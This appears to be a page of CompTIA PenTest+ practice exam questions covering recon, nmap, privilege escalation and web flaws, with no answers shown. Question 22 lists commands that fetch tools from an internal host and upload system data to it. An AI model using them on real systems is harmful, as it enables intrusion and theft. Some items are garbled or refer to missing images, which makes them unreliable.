
PT0-002 Practice Exam Questions and Answers

CompTIA PenTest+ Certification Exam

Last Update 6 days ago
Total Questions : 376

Question # 1

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

Options:

A. Perform forensic analysis to isolate the means of compromise and determine attribution.
B. Incorporate the newly identified method of compromise into the red team’s approach.
C. Create a detailed document of findings before continuing with the assessment.
D. Halt the assessment and follow the reporting procedures as outlined in the contract.
Question # 2

A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

Options:

A. Specially craft and deploy phishing emails to key company leaders.
B. Run a vulnerability scan against the company's external website.
C. Runtime the company's vendor/supply chain.
D. Scrape web presences and social-networking sites.
Question # 3

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:

  • Have a full TCP connection
  • Send a “hello” payload
  • Wait for a response
  • Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

Options:

A. Run nmap -Pn -sV --script vuln.
B. Employ an OpenVAS simple scan against the TCP port of the host.
C. Create a script in the Lua language and use it with NSE.
D. Perform a credentialed scan with Nessus.
Question # 4

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

Options:

A. /var/log/messages
B. /var/log/last_user
C. /var/log/user_log
D. /var/log/lastlog
Question # 5

Which of the following is the MOST effective person to validate results from a penetration test?

Options:

A. Third party
B. Team leader
C. Chief Information Officer
D. Client
Question # 6

Given the following code:

[image: code listing, not reproduced in this extract]

Which of the following data structures is systems?

Options:

A. A tuple
B. A tree
C. An array
D. A dictionary
Question # 7

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

Options:

A. SOW.
B. SLA.
C. ROE.
D. NDA.
Question # 8

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

Options:

A. Peach
B. WinDbg
C. GDB
D. OllyDbg
Question # 9

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

Options:

A. Mask
B. Rainbow
C. Dictionary
D. Password spraying
Question # 10

Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

Options:

A. Website scraping
B. Website cloning
C. Domain enumeration
D. URL enumeration
Question # 11

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

Options:

A. Weekly
B. Monthly
C. Quarterly
D. Annually
Question # 12

A company provided the following network scope for a penetration test:

169.137.1.0/24

221.10.1.0/24

149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?

Options:

A. The company that requested the penetration test
B. The penetration testing company
C. The target host's owner
D. The penetration tester
E. The subcontractor supporting the test
Question # 13

A security analyst needs to perform a scan for SMB port 445 over a /16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

Options:

A. Nmap -s 445 -Pn -T5 172.21.0.0/16
B. Nmap -p 445 -n -T4 -open 172.21.0.0/16
C. Nmap -sV --script=smb* 172.21.0.0/16
D. Nmap -p 445 -max -sT 172.21.0.0/16
Question # 14

Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?

Options:

A. Nessus
B. Metasploit
C. Burp Suite
D. Ettercap
Question # 15

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Options:

A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe type-casting operations
Question # 16

A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

Options:

A. Pick a lock.
B. Disable the cameras remotely.
C. Impersonate a package delivery worker.
D. Send a phishing email.
Question # 17

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

Options:

A. Open-source research
B. A ping sweep
C. Traffic sniffing
D. Port knocking
E. A vulnerability scan
F. An Nmap scan
Question # 18

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

Options:

A. Executive summary
B. Remediation
C. Methodology
D. Metrics and measures
Question # 19

A penetration tester runs the following command on a system:

find / -user root -perm -4000 -print 2>/dev/null

Which of the following is the tester trying to accomplish?

Options:

A. Set the SGID on all files in the / directory
B. Find the /root directory on the system
C. Find files with the SUID bit set
D. Find files that were created during exploitation and move them to /dev/null
Question # 20

A penetration tester is attempting to discover live hosts on a subnet quickly.

Which of the following commands will perform a ping scan?

Options:

A. nmap -sn 10.12.1.0/24
B. nmap -sV -A 10.12.1.0/24
C. nmap -Pn 10.12.1.0/24
D. nmap -sT -p- 10.12.1.0/24
Question # 21

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

Options:

A. Run nmap with the -o, -p22, and -sC options set against the target
B. Run nmap with the -sV and -p22 options set against the target
C. Run nmap with the --script vulners option set against the target
D. Run nmap with the -sA option set against the target
Question # 22

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

Options:

A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
Question # 23

A penetration tester writes the following script:

[image: script listing, not reproduced in this extract]

Which of the following is the tester performing?

Options:

A. Searching for service vulnerabilities
B. Trying to recover a lost bind shell
C. Building a reverse shell listening on specified ports
D. Scanning a network for specific open ports
Question # 24

A consulting company is completing the ROE during scoping.

Which of the following should be included in the ROE?

Options:

A. Cost of the assessment
B. Report distribution
C. Testing restrictions
D. Liability
Question # 25

The results of an Nmap scan are as follows:

[image: Nmap scan output, not reproduced in this extract]

Which of the following would be the BEST conclusion about this device?

Options:

A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
B. This device is most likely a gateway with in-band management services.
C. This device is most likely a proxy server forwarding requests over TCP/443.
D. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
Question # 26

A penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

Options:

A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team
D. Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address
E. Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop
F. Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements
Question # 27

A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?

Options:

A. Terminate the contract.
B. Update the ROE with new signatures.
C. Scan the 8-bit block to map additional missed hosts.
D. Continue the assessment.
Question # 28

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

Options:

A. Multiple handshakes
B. IP addresses
C. Encrypted file transfers
D. User hashes sent over SMB
Question # 29

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

Options:

A. Cross-site request forgery
B. Server-side request forgery
C. Remote file inclusion
D. Local file inclusion
Question # 30

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

Options:

A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel
Question # 31

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

Options:

A. Utilize the tunnel as a means of pivoting to other internal devices.
B. Disregard the IP range, as it is out of scope.
C. Stop the assessment and inform the emergency contact.
D. Scan the IP range for additional systems to exploit.
Question # 32

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

Options:

A. As backup in case the original documents are lost
B. To guide them through the building entrances
C. To validate the billing information with the client
D. As proof in case they are discovered
Question # 33

Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

Options:

A. The IP address is wrong.
B. The server is unreachable.
C. The IP address is on the blocklist.
D. The IP address is on the allow list.
Question # 34

During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?

Options:

A. Command injection
B. Broken authentication
C. Direct object reference
D. Cross-site scripting
Question # 35

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

Options:

A. VRFY and EXPN
B. VRFY and TURN
C. EXPN and TURN
D. RCPT TO and VRFY
Question # 36

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.

Which of the following describes the scope of the assessment?

Options:

A. Partially known environment testing
B. Known environment testing
C. Unknown environment testing
D. Physical environment testing
Question # 37

An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?

Options:

A. nmap -T3 192.168.0.1
B. nmap -P0 192.168.0.1
C. nmap -T0 192.168.0.1
D. nmap -A 192.168.0.1
Question # 38

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.

Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

Options:

A. SQLmap
B. Nessus
C. Nikto
D. DirBuster
Question # 39

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

Options:

A. Buffer overflows
B. Cross-site scripting
C. Race-condition attacks
D. Zero-day attacks
E. Injection flaws
F. Ransomware attacks
Question # 40

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

Options:

A. HTTPS communication
B. Public and private keys
C. Password encryption
D. Sessions and cookies
Question # 41

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

Options:

A. tcpdump
B. Snort
C. Nmap
D. Netstat
E. Fuzzer